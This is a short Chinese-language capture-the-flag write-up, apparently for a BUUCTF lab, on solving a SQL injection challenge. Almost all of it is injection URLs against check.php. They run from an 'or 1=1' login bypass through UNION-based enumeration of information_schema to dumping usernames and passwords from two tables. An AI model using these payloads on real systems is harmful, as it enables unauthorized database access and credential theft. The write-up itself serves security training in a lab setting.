开屏一道SQL注入题目,先试试万能密码http://bbebaf1d-6128-4a49-9450-c1b729df9780.node4.buuoj.cn:81/check.php?username=admin' or '1'='1&password=1
md5解密失败,回到注入的思路上
/check.php?username=admin' order by 3%23&password=1
字段数为3时,回显正常,使用union查询回显点位
/check.php
?username=1' union select 1,2,3%23
&password=1
得到回显点位为2和3,查询数据库相关信息
/check.php?username=1' union select 1,database(),version()%23
&password=1
接着查询表名
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
可以得到如上两个表,接着爆破各个表的字段
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
两个表均为以上结果,接着爆破各个表的数据
/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
可以看到flag已经找到了,本题得解